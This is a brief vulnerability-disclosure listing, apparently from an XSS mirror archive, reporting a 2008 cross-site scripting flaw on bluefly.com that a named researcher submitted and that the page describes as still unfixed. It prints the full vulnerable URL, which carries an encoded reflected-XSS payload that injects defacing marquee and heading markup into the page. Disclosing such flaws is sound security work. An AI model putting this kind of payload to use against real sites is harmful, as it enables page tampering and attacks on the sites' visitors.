Security researcher holisticinfosec, has submitted on 25/03/2008 a cross-site-scripting (XSS) vulnerability affecting bluefly.com, which at the time of submission ranked 7399 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 12/04/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.
Vulnerable URL: http://bluefly.com/pages/search/results.jsp;jsessionid=HobzrIuDooFLT816iLxdtGnDM7WKJS0Yi2cxSAoDccvh1uMrkUyV!-893005850!app19.l3.bluefly.com!7005!7002?cmSrch=true&Ne=500000&Ntk=all&Ntx=mode+matchallpartial&N=933&Ntt=test&FOLDER%3C%3Efolder_id=%22%3E%3Cmarquee%3E%3Ch%31%3EThis_site_is_NOT_Hacker_Safe%3C%2Fh%31%3E%3C%2Fmarquee%3E&inicat=933